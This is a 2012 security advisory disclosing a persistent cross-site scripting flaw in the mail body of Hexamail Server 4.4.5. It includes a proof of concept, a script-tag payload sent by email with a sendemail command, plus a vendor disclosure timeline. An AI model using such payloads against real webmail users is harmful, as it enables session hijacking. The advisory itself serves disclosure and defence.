#Title: Hexamail Server <= 4.4.5 Persistent XSS Vulnerability
#Date: June 3, 2012
#Author: modpr0be[at]Spentera, @modpr0be
#URL: http://www.spentera.com
#Software URL:http://www.hexamail.com/download/hexamailserversetup4.4.5.002.exe
#Tested on
#       OS: Windows XP SP3, Windows 2003 SP2, Windows 7 SP1
#       Browser: Chrome 19.0.x, IE9, Safari 5.1.7

Software Description
Hexamail provides intelligent email software solutions. Leveraging the latest 
advanced techniques, such as Bayesian matching, our products enable customers 
to eliminate email intrusions such as spam, malware, spyware, phishing attacks 
and virus.

Vulnerability Description
Hexamail Server suffers persistent XSS vulnerability in the mail body, allowing 
malicious user to execute scripts in a victim’s browser to hijack user sessions, 
redirect users, and or hijack the user’s browser.

Proof of concept
By sending a malicious script to the victim email, the webmail automatically 
load the mail body, so the script will be automatically executed without permission 
from user.

root@bt:~/# cat > meal.txt
<h1>XSS pop up</h1>
<script>alert('Hi, what is this?');</script>

Send email to the victim:
root@bt:~/# sendemail -f bob@example.com -t david@example.com -xu bob@example.com \
-xp bob123 -u "Want some meal..?" -o message-file=meal.txt -s mail.example.com

Vendor timeline
04/20/2012 - Issue discovered
04/20/2012 - Vendor contacted
04/27/2012 - Vendor respond and provides new upgrade version
04/30/2012 - Issue still affected on the latest upgrade version
04/30/2012 - Vendor said they still fixing the problem
05/10/2012 - Email sent to ask about the fix progress
06/02/2012 - No response. Advisory published.

Not available.

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Hexamail Server <= 4.4.5 Persistent XSS Vulnerability
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